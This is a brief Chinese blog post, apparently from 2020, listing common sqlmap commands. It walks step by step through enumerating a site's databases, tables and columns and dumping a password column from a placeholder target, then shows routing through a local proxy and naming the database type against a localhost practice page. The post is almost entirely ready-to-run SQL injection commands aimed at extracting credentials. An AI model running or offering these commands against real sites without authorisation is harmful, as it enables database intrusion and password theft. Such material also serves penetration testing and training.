sqlmap常用命令

ItBJLan 2020-02-20

---------------------------------------------------------------------------------------------------------------------------------------------
(1) 查找数据库

python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" --dbs

(2) 通过1中的数据库查找对应的表 (假如通过1,得到的是dataname)

python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname --tables

(3) 通过2中的数据表得到字段(假如得到的是tablename表)

python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -T tablename --columns

(4) 通过3得到字段值(假如从3中得到字段id,password)

python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -T tablename -C "password" --dump


-------------------------------------------------------------------------------------------------------------------------------------------
使用代理

sqlmap.py -u "http://localhost/sqlzhurulianxi.php?id=1" --proxy=http://127.0.0.1:8080

指定数据库类型

sqlmap.py -u “http://localhost/sqlzhurulianxi.php?id=1” --dbms=MySQL

相关推荐